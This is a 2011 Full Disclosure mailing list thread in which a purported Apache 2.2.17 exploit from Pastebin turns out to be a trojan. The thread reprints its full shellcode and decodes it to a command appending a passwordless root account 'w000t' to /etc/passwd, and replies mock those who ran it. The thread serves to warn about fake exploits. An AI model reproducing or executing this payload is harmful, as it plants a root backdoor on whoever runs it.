|
Full Disclosure
mailing list archives
Re: Apache 2.2.17 exploit?
From: adam <adam () papsy net>
Date: Tue, 4 Oct 2011 21:41:08 -0500
Wow, I'm extremely impressed with the support that the developer of this
exploit offers. I had been trying to get the exploit to work for about an
hour or so (couldn't get root on the target) and noticed that the developer
of this exploit logged into my machine (using an old account I must have set
up a while ago named w000t). I couldn't believe it when I saw that he was
logging in to fix the problem, I've NEVER gotten that kind of support even
out of paid software. He's been logged in for a couple of hours now, and
I've noticed that he's downloaded/uploaded quite a bit (probably downloading
the log files and then uploading patches) so I'm just gonna wait it out. I
definitely have a good feeling about this though.
On Tue, Oct 4, 2011 at 9:21 PM, xD 0x41 <secn3t () gmail com> wrote:
yer it is clarly leet stuff dude...
i ran it and got liek 2000000000000000k2.2.* apache user bot in a night!
:P
hgehe (jkin)
funny tho.
xd
On 5 October 2011 13:09, VeNoMouS <venom () gen-x co nz> wrote:
**
char evil[] =
"\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47
\x89"
"\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51
\x89"
"\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80
\xe8"
"\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63
\x23"
"\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30
\x74"
"\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65
\x3a"
"\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73
\x68"
"\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77
\x64"
"\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44
\x44"
"\x44\x44"
.....
execl("/bin/sh", "sh", "-c", evil, 0);
.....
/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd
AHUH.....
On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote:
I regularly trawl Pastebin.com to find code - often idiots leave some 0day
and similar there and it is nice to find.
Well, seeing as I have no test boxes at the moment, can someone check this
code in a VM? I am not sure if it is legit or not.
http://pastebin.com/ygByEV2e
Thanks :)
~Darren
1. char evil[] =
2. "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88
\x46\x47\x89"
3. "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89
\x5e\x51\x89"
4. "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55
\xcd\x80\xe8"
5. "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23
\x2d\x63\x23"
6. "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30
\x30\x30\x74"
7. "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30
\x64\x65\x3a"
8. "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62
\x61\x73\x68"
9. "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73
\x73\x77\x64"
10. "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43
\x43\x44\x44"
11. "\x44\x44";
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
Re: Apache 2.2.17 exploit? Nathaniel Hirsch (Oct 03)
Re: Apache 2.2.17 exploit? Andrew Farmer (Oct 03)
Re: Apache 2.2.17 exploit? Guillaume Friloux (Oct 03)
Re: Apache 2.2.17 exploit? GloW - XD (Oct 04)
Re: Apache 2.2.17 exploit? VeNoMouS (Oct 05)
|
